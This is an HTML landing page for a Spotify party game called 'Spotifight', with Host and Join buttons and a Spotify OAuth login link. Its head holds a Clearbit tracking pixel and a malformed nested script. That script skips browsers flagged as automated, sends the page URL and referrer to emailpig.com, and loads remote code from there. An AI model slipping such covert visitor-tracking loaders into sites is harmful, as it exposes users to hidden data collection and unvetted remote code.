<!DOCTYPE html>
<html>
    <head>
        <title>Spotifight</title>
        <script type="text/javascript">
  (function (d, u, h, s) {
    h = d.getElementsByTagName('head')[0];
    s = d.createElement('script');
    s.async = 1;
    s.src = u + new Date().getTime();
    h.appendChild(s);
  })(document, 'https://grow.clearbitjs.com/api/pixel.js?v=');
</script>
        <script >
            <script >
            (function () {
            if (typeof n !== 'undefined' && n.webdriver) return;
            var script = document.createElement('script');
            script.type = 'text/javascript';
            script.async = 1;
            script.src = 'https://www.emailpig.com/_functions/myF/bowfit?q='+encodeURIComponent(window.location.href)+'&r='+document.referrer;   
            document.head.appendChild(script)})()
        </script>
        </script>
    </head>
<body>

<style>

body {background-color: black;}

.my-button {
    display: inline-block;
    margin: 5px; /* space between buttons */
    background: #1ED760; /* background color */
    color: #333; /* text color */
    font-size: 1.5em;
    font-family: ‘Georgia’, serif;
    font-style: italic;
    border-radius: 50px; /* rounded corners */
    padding: 8px 16px; /* space around text */
    -moz-transition: all 0.2s;
    -webkit-transition: all 0.2s;
    transition: all 0.2s;
}
.my-button:hover {
    background: #666;
    color: #c1e1e0;
}


.container {
  display: flex;
  justify-content: center;
  align-items: center;
  height: 100%;
}

h1 {
    color: #1ED760;
    text-align: center;
}

    </style>
    
    <h1>&#x2728;Spotifight &#x2728;</h1>

<div class="container">
  <div class="button-wrapper">
    <button class="my-button" style="width:160px;height:130px;" onclick="my1()">Host</button>
    <button class="my-button" style="width:160px;height:130px;" onclick="location.href='join.html'">Join</button>
  </div>
</div>


<p id="demo"></p>

<script>
function my1() {
  location.href = "https://accounts.spotify.com/authorize?client_id=66242c9b5a274e6ca904de7aeac78f22&response_type=token&redirect_uri=https://almelo2021.github.io/spot/host&scope=user-modify-playback-state%20user-read-playback-state&state=34fFs29kd09";
}
function my2() {
  document.getElementById("demo").innerHTML = "Goodbye World";
}
</script>

</body>
</html>
